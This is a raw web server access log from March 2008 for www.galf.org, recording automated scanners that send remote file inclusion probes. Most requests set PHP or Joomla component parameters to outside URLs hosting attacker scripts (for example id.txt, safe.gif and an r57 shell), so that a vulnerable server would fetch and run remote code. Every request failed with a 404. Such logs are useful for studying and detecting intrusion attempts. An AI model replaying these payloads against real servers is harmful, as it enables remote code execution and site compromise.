84.18.207.65 - - [30/Mar/2008:19:14:32 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [30/Mar/2008:19:14:32 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:14:46 -0700] "GET /logs/access_070903.log//activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:14:46 -0700] "GET //activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:14:46 -0700] "GET /logs//activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.122.44.247 - - [30/Mar/2008:19:14:52 -0700] "GET /logs/index2.php?page=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
201.122.44.247 - - [30/Mar/2008:19:14:52 -0700] "GET /index2.php?page=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:15:02 -0700] "GET /logs/access_070903.log//activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:15:03 -0700] "GET //activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:15:03 -0700] "GET /logs//activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:15:08 -0700] "GET /logs/access_070903.log//activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:15:08 -0700] "GET //activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:15:08 -0700] "GET /logs//activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:15:15 -0700] "GET /logs/access_070903.log//activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:15:16 -0700] "GET //activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:15:16 -0700] "GET /logs//activate.php?language=conf&footerpage=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
205.234.99.75 - - [30/Mar/2008:19:15:49 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.99.75 - - [30/Mar/2008:19:15:49 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.14.216.89 - - [30/Mar/2008:19:15:56 -0700] "GET /logs/access_070716.log/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.14.216.89 - - [30/Mar/2008:19:15:57 -0700] "GET /logs/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.manzoteam.it/millesimo/foto_week/36.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.106.163.232 - - [30/Mar/2008:19:16:01 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.163.232 - - [30/Mar/2008:19:16:01 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.capecoral-golf.com/tsys/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:16:40 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:16:40 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:17:05 -0700] "GET /logs/access_071203.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:17:05 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:17:45 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:17:46 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:19:18:00 -0700] "GET /logs/access_071022.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.99.75 - - [30/Mar/2008:19:18:21 -0700] "GET /logs/access_071203.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.99.75 - - [30/Mar/2008:19:18:21 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:18:22 -0700] "GET /logs/access_071203.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:18:22 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:19:18:28 -0700] "GET /logs/access_071217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:19:18:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.19.255.240 - - [30/Mar/2008:19:18:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:19:13 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:19:13 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:19:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.68.45.40 - - [30/Mar/2008:19:20:20 -0700] "GET /logs/index2.php?page=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:20:25 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:20:25 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:20:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.68.45.40 - - [30/Mar/2008:19:20:27 -0700] "GET /index2.php?page=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:20:28 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:20:28 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:20:28 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.185.237.35 - - [30/Mar/2008:19:20:29 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [30/Mar/2008:19:20:29 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [30/Mar/2008:19:20:30 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:21:23 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.246.77.203 - - [30/Mar/2008:19:21:23 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.246.77.203 - - [30/Mar/2008:19:21:23 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:22:27 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:22:27 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:22:27 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:22:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:22:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:22:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
216.246.77.203 - - [30/Mar/2008:19:23:15 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:23:15 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:23:15 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [30/Mar/2008:19:23:23 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
64.185.237.35 - - [30/Mar/2008:19:23:23 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
64.185.237.35 - - [30/Mar/2008:19:23:23 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:23:32 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:23:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:23:33 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:24:53 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.246.77.203 - - [30/Mar/2008:19:24:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.246.77.203 - - [30/Mar/2008:19:24:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
203.146.251.123 - - [30/Mar/2008:19:25:00 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:25:27 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:25:27 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:25:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:25:32 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:25:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:25:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:19:26:49 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:27:29 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:27:29 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:27:29 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:27:31 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:27:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:27:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.213.67 - - [30/Mar/2008:19:28:47 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.13.82 - - [30/Mar/2008:19:29:43 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:29:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.19.13.82 - - [30/Mar/2008:19:29:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
64.185.237.35 - - [30/Mar/2008:19:30:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [30/Mar/2008:19:30:05 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:19:30:23 -0700] "GET /logs/access_071014.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:31:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:31:12 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
220.135.204.131 - - [30/Mar/2008:19:34:16 -0700] "GET /logs/access_071014.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:19:35:31 -0700] "GET /logs/access_071203.log//agendax/addevent.inc.php?agendax_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:19:35:35 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.116.174.9 - - [30/Mar/2008:19:35:38 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://listagalaxy.altervista.org/r57??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:36:44 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:36:44 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:36:44 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:36:44 -0700] "GET /logs/access_071022.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:37:00 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:37:00 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:37:00 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:37:01 -0700] "GET /logs/access_071022.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:37:41 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:37:41 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:37:42 -0700] "GET /logs/access_071022.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:37:42 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:37:43 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:37:43 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:37:48 -0700] "GET /logs/access_071022.log//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:37:48 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:37:49 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
